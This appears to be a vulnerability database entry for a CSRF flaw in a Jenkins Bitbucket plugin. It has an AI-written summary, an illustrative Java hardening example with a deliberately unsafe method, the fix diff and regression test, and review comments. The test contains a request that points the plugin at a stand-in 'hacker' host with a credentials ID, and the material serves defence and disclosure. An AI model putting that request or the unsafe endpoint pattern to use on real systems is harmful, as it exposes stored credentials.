CVE-2022-20619
Description
A CSRF vulnerability in Jenkins Bitbucket Branch Source Plugin allows attackers to connect to an attacker-specified URL using stolen credentials.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
A cross-site request forgery (CSRF) vulnerability exists in Jenkins Bitbucket Branch Source Plugin 737.vdf9dc06105be and earlier. The plugin does not require a POST request or perform a permission check on a specific endpoint, enabling an attacker to craft a malicious request that, when triggered by an authenticated Jenkins user, connects to an attacker-specified URL using attacker-specified credentials IDs (initially obtained through another method). This allows the attacker to capture credentials stored in Jenkins. [1][2][3]
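To make the two missing controls concrete, the following is an added illustration of a Jenkins/Stapler "fill" endpoint before and after hardening. It is not the plugin's own code and not taken from the fix commit; the class `ExampleSCMSourceDescriptor`, the helper `lookupRepositories`, and the choice of `Item.EXTENDED_READ` as the required permission are assumptions made for this example, while `@RequirePOST`, `Jenkins.get()`, `hasPermission` and `ListBoxModel` are real Jenkins core and Stapler APIs.

```java
// Added example of the CSRF hardening pattern for a Stapler fill endpoint.
// NOT the Bitbucket Branch Source Plugin's code; ExampleSCMSourceDescriptor and
// lookupRepositories are hypothetical stand-ins.
package example;

import hudson.model.Item;
import hudson.util.ListBoxModel;
import jenkins.model.Jenkins;
import jenkins.scm.api.SCMSourceOwner;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

public class ExampleSCMSourceDescriptor {

    // Before: reachable with a plain GET and without any permission check.
    // A page on another origin can make a logged-in user's browser request
    // .../fillRepositoryItems?serverUrl=...&credentialsId=... and the Jenkins
    // controller then connects outbound to serverUrl with the named credentials.
    public ListBoxModel doFillRepositoryItemsUnsafe(@AncestorInPath SCMSourceOwner context,
                                                    @QueryParameter String serverUrl,
                                                    @QueryParameter String credentialsId) {
        return lookupRepositories(serverUrl, credentialsId);
    }

    // After: @RequirePOST makes Stapler answer GET with 405 "This URL requires POST",
    // and a cross-origin POST is stopped by Jenkins' CSRF crumb protection.
    // The explicit permission check additionally stops an authenticated but
    // unprivileged user from pointing the controller at an arbitrary server.
    @RequirePOST
    public ListBoxModel doFillRepositoryItems(@AncestorInPath SCMSourceOwner context,
                                              @QueryParameter String serverUrl,
                                              @QueryParameter String credentialsId) {
        boolean allowed = context == null
                ? Jenkins.get().hasPermission(Jenkins.ADMINISTER)
                : context.hasPermission(Item.EXTENDED_READ);
        if (!allowed) {
            // Degrade quietly: an empty dropdown instead of a lookup on the caller's behalf.
            return new ListBoxModel();
        }
        return lookupRepositories(serverUrl, credentialsId);
    }

    // Hypothetical stand-in for the remote repository lookup.
    private ListBoxModel lookupRepositories(String serverUrl, String credentialsId) {
        ListBoxModel result = new ListBoxModel();
        result.add("example-repo");
        return result;
    }
}
```

The `@RequirePOST` annotation alone produces the 405 response that the fix commit's `Security2467Test` asserts on; the permission check covers the separate case of an authenticated user who can already send a crumbed POST, which the CSRF guard does not address.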
Exploitation
To exploit this vulnerability, an attacker must first obtain credentials IDs from Jenkins via another method (e.g., a separate vulnerability or information disclosure). The attacker then crafts a CSRF attack, tricking an authenticated Jenkins user into visiting a malicious page or link. The request is made to the vulnerable endpoint in Bitbucket Branch Source Plugin, using the stolen credentials IDs to connect to an attacker-controlled server. This results in the credentials being transmitted to the attacker. [1][3]
Impact
A successful attack results in the disclosure of credentials stored in Jenkins. The attacker can capture these credentials by having the Jenkins instance connect to an attacker-specified URL using the known credentials IDs. This compromises the confidentiality of Jenkins-managed secrets and can lead to further unauthorized access to systems that those credentials protect. [1][3]
Mitigation
The vulnerability is fixed in Bitbucket Branch Source Plugin version 746.v350d2781c184 and later, released on January 12, 2022. Users should upgrade to this version or later. No workarounds are documented in the available references. [1][2]
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| org.jenkins-ci.plugins:cloudbees-bitbucket-branch-source (Maven) | >= 726.v7e6f53de133c, < 746.v350d2781c184 | 746.v350d2781c184 |
| org.jenkins-ci.plugins:cloudbees-bitbucket-branch-source (Maven) | >= 720.vbe985dd73d66, < 725.vd9f8be0fa250 | 725.vd9f8be0fa250 |
| org.jenkins-ci.plugins:cloudbees-bitbucket-branch-source (Maven) | >= 2.9.8, < 2.9.11.2 | 2.9.11.2 |
| org.jenkins-ci.plugins:cloudbees-bitbucket-branch-source (Maven) | < 2.9.7.2 | 2.9.7.2 |
Affected products
- GHSA coordinates, range: >= 726.v7e6f53de133c, < 746.v350d2781c184
- Range: unspecified
Patches
a596f651a4b3 SECURITY-2467
2 files changed · +41 −0
src/main/java/com/cloudbees/jenkins/plugins/bitbucket/BitbucketSCMSource.java+2 −0 modified@@ -121,6 +121,7 @@ import org.kohsuke.stapler.DataBoundConstructor; import org.kohsuke.stapler.DataBoundSetter; import org.kohsuke.stapler.QueryParameter; +import org.kohsuke.stapler.interceptor.RequirePOST; /** * SCM source implementation for Bitbucket. @@ -1191,6 +1192,7 @@ public ListBoxModel doFillCredentialsIdItems(@AncestorInPath SCMSourceOwner cont } @SuppressWarnings("unused") // used By stapler + @RequirePOST public ListBoxModel doFillRepositoryItems(@AncestorInPath SCMSourceOwner context, @QueryParameter String serverUrl, @QueryParameter String credentialsId,
src/test/java/com/cloudbees/jenkins/plugins/bitbucket/Security2467Test.java+39 −0 added@@ -0,0 +1,39 @@ +package com.cloudbees.jenkins.plugins.bitbucket; + +import com.gargoylesoftware.htmlunit.html.HtmlPage; +import java.net.HttpURLConnection; +import jenkins.model.Jenkins; +import org.jenkinsci.plugins.workflow.multibranch.WorkflowMultiBranchProject; +import org.junit.Rule; +import org.junit.Test; +import org.jvnet.hudson.test.Issue; +import org.jvnet.hudson.test.JenkinsRule; +import org.jvnet.hudson.test.MockAuthorizationStrategy; + +import static org.hamcrest.MatcherAssert.assertThat; +import static org.hamcrest.Matchers.containsString; +import static org.hamcrest.Matchers.is; + +public class Security2467Test { + + @Rule + public JenkinsRule j = new JenkinsRule(); + + @Issue("SECURITY-2467") + @Test + public void doFillRepositoryItemsWhenInvokedUsingGetMethodThenReturnMethodNotAllowed() throws Exception { + String admin = "Admin"; + String projectName = "p"; + WorkflowMultiBranchProject pr = j.jenkins.createProject(WorkflowMultiBranchProject.class, projectName); + j.jenkins.setSecurityRealm(j.createDummySecurityRealm()); + j.jenkins.setAuthorizationStrategy(new MockAuthorizationStrategy(). + grant(Jenkins.ADMINISTER).everywhere().to(admin)); + + JenkinsRule.WebClient webClient = j.createWebClient().withThrowExceptionOnFailingStatusCode(false); + webClient.login(admin); + HtmlPage htmlPage = webClient.goTo("job/" + projectName +"/descriptorByName/com.cloudbees.jenkins.plugins.bitbucket.BitbucketSCMSource/fillRepositoryItems?serverUrl=http://hacker:9000&credentialsId=ID_Admin&repoOwner=admin"); + + assertThat(htmlPage.getWebResponse().getStatusCode(), is(HttpURLConnection.HTTP_BAD_METHOD)); + assertThat(htmlPage.getWebResponse().getContentAsString(), containsString("This URL requires POST")); + } +}
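Review bot: the second hunk in BitbucketSCMSource.java adds only `@RequirePOST` to `doFillRepositoryItems`, yet the advisory text above also names a missing permission check, and no check is visible in the hunk. `@RequirePOST` closes the GET-based CSRF path, but any authenticated user able to send a crumbed POST can still have the controller connect to `serverUrl` with `credentialsId`. Confirm that the method body (not shown in the diff) checks the caller's permission on `context` before performing the lookup, for example `if (context == null ? !Jenkins.get().hasPermission(Jenkins.ADMINISTER) : !context.hasPermission(Item.EXTENDED_READ)) return new ListBoxModel();`, or add that guard as part of this change.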
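Review bot: Security2467Test covers only the GET-returns-405 case, and it runs as an administrator (`grant(Jenkins.ADMINISTER).everywhere().to(admin)`), so the permission path described in the advisory is never exercised. Add a second case in which a user without the required permission submits a POST with a valid crumb and assert that an empty model is returned, so a regression in the permission check is caught rather than only a regression in the method guard. Minor style point: `"job/" + projectName +"/descriptorByName/..."` is missing a space before the second `+`.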
Vulnerability mechanics
Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-w4jv-6rg4-pr4m (ghsa; advisory)
- nvd.nist.gov/vuln/detail/CVE-2022-20619 (ghsa; advisory)
- www.openwall.com/lists/oss-security/2022/01/12/6 (ghsa; mailing list, x_refsource_MLIST; web)
- github.com/CVEProject/cvelist/blob/2d78eb36f4d084db7fb35f1535d8d84fdcb7d859/2022/20xxx/CVE-2022-20619.json (ghsa; web)
- github.com/jenkinsci/bitbucket-branch-source-plugin/commit/a596f651a4b3bfe31a087c4d392e81c0167ab551 (ghsa; web)
- www.jenkins.io/security/advisory/2022-01-12/ (ghsa; x_refsource_CONFIRM; web)
News mentions
- Jenkins Security Advisory 2022-01-12 (Jenkins Security Advisories, Jan 12, 2022)